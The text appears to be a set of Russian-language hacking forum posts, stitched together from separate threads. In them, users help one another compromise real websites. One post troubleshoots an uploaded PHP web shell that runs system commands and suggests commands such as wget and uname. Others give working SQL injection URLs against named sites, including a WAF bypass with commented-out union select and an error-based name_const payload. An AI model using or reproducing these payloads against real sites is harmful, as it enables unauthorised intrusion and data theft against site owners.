Нет, 1 2 Warning: system() [function.system]: Cannot execute a blank command in /usr/local/www/data/555.php on line 1 4 5 6 7
blank - пустой Вы вызываете шелл-код с пустыми параметрами. Как и сказал faza02 передайте какой-либо аргумент в функцию вызова.
Здрасвуйте! Помогите разобраться, заливаю php файл, на сайт. И он доступен по силке site/folder//file.php?file=2278 но сразу начинаеться скачивание, а можно сделать так чтоб он отображался на сайте?
В базе нашел только это: r_files:id r_files:name r_files:extn r_files:hashname r_files:type r_files:size r_filesassword r_files:rid r_files:hashnews r_files:visitors А брутить путь это как?
у вас там system. system - выполнение системных команд. что за системная команда 1? передайте ls, wget, cd, pwd, uname, но не 1
Бегло осмотрел. MQ on Фильтруются запятые, служебные символы типа @ Скобки не фильтруются. Попробуй функции, которым не нужна запятая в синтаксисе Типа http://www.maesen.com/sexshop/ArticulosMini.php?pagina=45+and+49=(select+ascii((1))) Опять же некоторые выборочно фильтруются. Функция Ord например. Может быть, есть смысл пообходить ваф. Я сейчас не в тех условиях, когда могу генерировать траффик =) Направление для мыслей дал.
Как обойти сей WAF: Code: http://www.szrf.ru/oglavlenie.phtml?nb=edition00&issid=-2015009000+order+by+8-- Задержка какая-то если использовать union select.
все стандартно: Code: http://www.szrf.ru/oglavlenie.phtml?nb=edition00&issid=-2015009000+/*!union*/+select+1,2,3,4,5,version(),7,8--+ error-based: Code: http://www.szrf.ru/oglavlenie.phtml?nb=edition00&issid=-2015009000+|%28select*from%28select%20name_const%28version%28%29,1%29,name_const%28version%28%29,1%29%29a%29 главное, чтобы не было union (возможно что-то еще, не смотрел дальше)
